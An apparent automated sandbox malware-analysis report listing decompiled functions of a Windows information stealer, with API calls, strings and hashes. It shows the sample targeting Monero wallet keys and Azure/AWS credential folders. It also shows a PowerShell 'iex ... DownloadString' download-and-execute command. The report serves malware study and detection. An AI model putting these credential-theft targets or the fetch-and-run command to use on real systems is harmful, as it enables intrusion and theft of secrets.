                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                        • String ID:
                        • API String ID: 2428362635-0
                        • Opcode ID: 9ed3eb83fffde357b775e23c0da7b14301ae428256e03d872acee6ebd8863ed2
                        • Instruction ID: 99ddf9a09fafa9403aae15bbe911e05c5fc553977a1a2ed3bb0dc16671c38f50
                        • Opcode Fuzzy Hash: 9ed3eb83fffde357b775e23c0da7b14301ae428256e03d872acee6ebd8863ed2
                        • Instruction Fuzzy Hash: 2E02C370A016099FCB21EF65C989AAF7BB9FF44304F148129F90597290EB78DD46CF98
                        Function 004F1190 Relevance: 42.3, APIs: 22, Strings: 2, Instructions: 280stringfileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 004F1120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004F1135
                          • Part of subcall function 004F1120: RtlAllocateHeap.NTDLL(00000000), ref: 004F113C
                          • Part of subcall function 004F1120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 004F1159
                          • Part of subcall function 004F1120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 004F1173
                          • Part of subcall function 004F1120: RegCloseKey.ADVAPI32(?), ref: 004F117D
                        • lstrcat.KERNEL32(?,00000000), ref: 004F11C0
                        • lstrlen.KERNEL32(?), ref: 004F11CD
                        • lstrcat.KERNEL32(?,.keys), ref: 004F11E8
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004F121F
                        • lstrlen.KERNEL32(01038A70), ref: 004F122D
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F1251
                        • lstrcat.KERNEL32(00000000,01038A70), ref: 004F1259
                        • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 004F1264
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1288
                        • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 004F1294
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F12BA
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004F12FF
                        • lstrlen.KERNEL32(0103D010), ref: 004F130E
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F1335
                        • lstrcat.KERNEL32(00000000,?), ref: 004F133D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1378
                        • lstrcat.KERNEL32(00000000), ref: 004F1385
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F13AC
                        • CopyFileA.KERNEL32(?,?,00000001), ref: 004F13D5
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F1401
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F143D
                          • Part of subcall function 0050EDE0: lstrcpy.KERNEL32(00000000,?), ref: 0050EE12
                        • DeleteFileA.KERNEL32(?), ref: 004F1471
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                        • String ID: .keys$\Monero\wallet.keys
                        • API String ID: 2881711868-3586502688
                        • Opcode ID: d57428b738bb82ba8e2433dc668127b21e2ddcad197cd9d5eedbd60a73d9e1c4
                        • Instruction ID: e4a9f6cd210123054eab0c05652f9e90f0168d42168652e798af76d816ae1a36
                        • Opcode Fuzzy Hash: d57428b738bb82ba8e2433dc668127b21e2ddcad197cd9d5eedbd60a73d9e1c4
                        • Instruction Fuzzy Hash: 90A1A271A0120E9BDB21EFA5DD49ABF77B8EF44304F04406AFA05E7261DB78DD418B98
                        Function 0050E720 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 199stringCOMMON
                        Download Yara Rule
                        APIs
                        • memset.MSVCRT ref: 0050E740
                        • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0050E769
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050E79F
                        • lstrcat.KERNEL32(?,00000000), ref: 0050E7AD
                        • lstrcat.KERNEL32(?,\.azure\), ref: 0050E7C6
                        • memset.MSVCRT ref: 0050E805
                        • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0050E82D
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050E85F
                        • lstrcat.KERNEL32(?,00000000), ref: 0050E86D
                        • lstrcat.KERNEL32(?,\.aws\), ref: 0050E886
                        • memset.MSVCRT ref: 0050E8C5
                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0050E8F1
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050E920
                        • lstrcat.KERNEL32(?,00000000), ref: 0050E92E
                        • lstrcat.KERNEL32(?,\.IdentityService\), ref: 0050E947
                        • memset.MSVCRT ref: 0050E986
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$memset$FolderPathlstrcpy
                        • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                        • API String ID: 4067350539-3645552435
                        • Opcode ID: 7b264939e06cba468b9c623fe2d53a9eee15dc3c51e0a571a41f5d88e82a3970
                        • Instruction ID: 9b906c4cc63568a47488b9aebaf8be7b3346a797e14a820a8e7735f3bbfb607d
                        • Opcode Fuzzy Hash: 7b264939e06cba468b9c623fe2d53a9eee15dc3c51e0a571a41f5d88e82a3970
                        • Instruction Fuzzy Hash: 5671E471E4022DABDB31EB64DD46FED7B74FF48700F144898B7199B1C0DAB49A848B58
                        Function 0050ABB2 Relevance: 39.3, APIs: 25, Strings: 1, Instructions: 297stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32 ref: 0050ABCF
                        • lstrlen.KERNEL32(0103DE88), ref: 0050ABE5
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050AC0D
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0050AC18
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050AC41
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050AC84
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0050AC8E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050ACB7
                        • lstrlen.KERNEL32(00524AD4), ref: 0050ACD1
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050ACF3
                        • lstrcat.KERNEL32(00000000,00524AD4), ref: 0050ACFF
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050AD28
                        • lstrlen.KERNEL32(00524AD4), ref: 0050AD3A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050AD5C
                        • lstrcat.KERNEL32(00000000,00524AD4), ref: 0050AD68
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050AD91
                        • lstrlen.KERNEL32(0103DD68), ref: 0050ADA7
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050ADCF
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0050ADDA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050AE03
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050AE3F
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0050AE49
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050AE6F
                        • lstrlen.KERNEL32(00000000), ref: 0050AE85
                        • lstrcpy.KERNEL32(00000000,0103DE28), ref: 0050AEB8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen
                        • String ID: f
                        • API String ID: 2762123234-1993550816
                        • Opcode ID: 469011fbf1fe49a670546cb9f24ce4e772c4a68b1b88a2b1a02ba348cfa36626
                        • Instruction ID: ab6f9f491c44d5c2d3a7099a5c97d952b5b59cb17cd88944a03dbcc42de11380
                        • Opcode Fuzzy Hash: 469011fbf1fe49a670546cb9f24ce4e772c4a68b1b88a2b1a02ba348cfa36626
                        • Instruction Fuzzy Hash: 4AB1D231A1121A9BDB32EF65CD49ABF7BB9FF00304F044429B905972A1DBB8DD01CB99
                        Function 005147E0 Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 48libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNEL32(ws2_32.dll,?,005072A4), ref: 005147E6
                        • GetProcAddress.KERNEL32(00000000,connect), ref: 005147FC
                        • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 0051480D
                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0051481E
                        • GetProcAddress.KERNEL32(00000000,htons), ref: 0051482F
                        • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 00514840
                        • GetProcAddress.KERNEL32(00000000,recv), ref: 00514851
                        • GetProcAddress.KERNEL32(00000000,socket), ref: 00514862
                        • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 00514873
                        • GetProcAddress.KERNEL32(00000000,closesocket), ref: 00514884
                        • GetProcAddress.KERNEL32(00000000,send), ref: 00514895
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                        • API String ID: 2238633743-3087812094
                        • Opcode ID: 6818fc0a8cbd163be9bda36d22127abe8653838618f31ea16c2c1d0d151b565c
                        • Instruction ID: c0c9d2c648123c13451fabd742782143049eff61ec2fe4998f101f44706ca908
                        • Opcode Fuzzy Hash: 6818fc0a8cbd163be9bda36d22127abe8653838618f31ea16c2c1d0d151b565c
                        • Instruction Fuzzy Hash: 86111871D52725EBC3709FB4BC0DE563EB8BE0A705709981AF291E21A0FAFD4012CB59
                        Function 0050BE20 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 203stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 0050BE53
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 0050BE86
                        • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 0050BE91
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050BEB1
                        • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 0050BEBD
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050BEE0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0050BEEB
                        • lstrlen.KERNEL32(')"), ref: 0050BEF6
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050BF13
                        • lstrcat.KERNEL32(00000000,')"), ref: 0050BF1F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050BF46
                        • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 0050BF66
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050BF88
                        • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 0050BF94
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050BFBA
                        • ShellExecuteEx.SHELL32(?), ref: 0050C00C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        • API String ID: 4016326548-898575020
                        • Opcode ID: c87bc6a7a86748391344a6b34eb86fcd9b84b0bdf94dc7c6f57839e50b831bf0
                        • Instruction ID: c9a24be4bc8a98aa04fe7975056f0a508b3e1ec3001a8559fb718fe7f1655049
                        • Opcode Fuzzy Hash: c87bc6a7a86748391344a6b34eb86fcd9b84b0bdf94dc7c6f57839e50b831bf0
                        • Instruction Fuzzy Hash: C261B570E1121A9BEB21AFB6DD896AF7FA8FF05304F044429F605D7291DB78CD028B59
                        Function 00511820 Relevance: 31.5, APIs: 25, Instructions: 269stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 0051184F
                        • lstrlen.KERNEL32(01026048), ref: 00511860
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00511887
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00511892
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005118C1
                        • lstrlen.KERNEL32(00524FA0), ref: 005118D3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005118F4
                        • lstrcat.KERNEL32(00000000,00524FA0), ref: 00511900
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0051192F
                        • lstrlen.KERNEL32(01026058), ref: 00511945
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0051196C
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00511977
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005119A6
                        • lstrlen.KERNEL32(00524FA0), ref: 005119B8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005119D9
                        • lstrcat.KERNEL32(00000000,00524FA0), ref: 005119E5
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00511A14
                        • lstrlen.KERNEL32(01026088), ref: 00511A2A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00511A51
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00511A5C
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00511A8B
                        • lstrlen.KERNEL32(010260F8), ref: 00511AA1
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00511AC8
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00511AD3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00511B02
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcatlstrlen
                        • String ID:
                        • API String ID: 1049500425-0
                        • Opcode ID: c4609b3fc098217a4135949a6b098abe52c244b2c982c7dbf5403092c1aec713
                        • Instruction ID: e07d94a0135f7438875c5a4353ff2c3bca33d8c0a55be00dafc3f41297e10aeb
                        • Opcode Fuzzy Hash: c4609b3fc098217a4135949a6b098abe52c244b2c982c7dbf5403092c1aec713
                        • Instruction Fuzzy Hash: 22912FB160170B9BE7309FB6DD88A667BECFF04304F148469AA96C3251DB78DC81CB58
                        Function 00504760 Relevance: 30.3, APIs: 18, Strings: 2, Instructions: 309stringmemoryCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,?), ref: 00504793
                        • LocalAlloc.KERNEL32(00000040,?), ref: 005047C5
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 00504812
                        • lstrlen.KERNEL32(00524B60), ref: 0050481D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050483A
                        • lstrcat.KERNEL32(00000000,00524B60), ref: 00504846
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050486B
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00504898
                        • lstrcat.KERNEL32(00000000,00000000), ref: 005048A3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005048CA
                        • StrStrA.SHLWAPI(?,00000000), ref: 005048DC
                        • lstrlen.KERNEL32(?), ref: 005048F0
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 00504931
                        • lstrcpy.KERNEL32(00000000,?), ref: 005049B8
                        • lstrcpy.KERNEL32(00000000,?), ref: 005049E1
                        • lstrcpy.KERNEL32(00000000,?), ref: 00504A0A
                        • lstrcpy.KERNEL32(00000000,?), ref: 00504A30
                        • lstrcpy.KERNEL32(00000000,?), ref: 00504A5D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
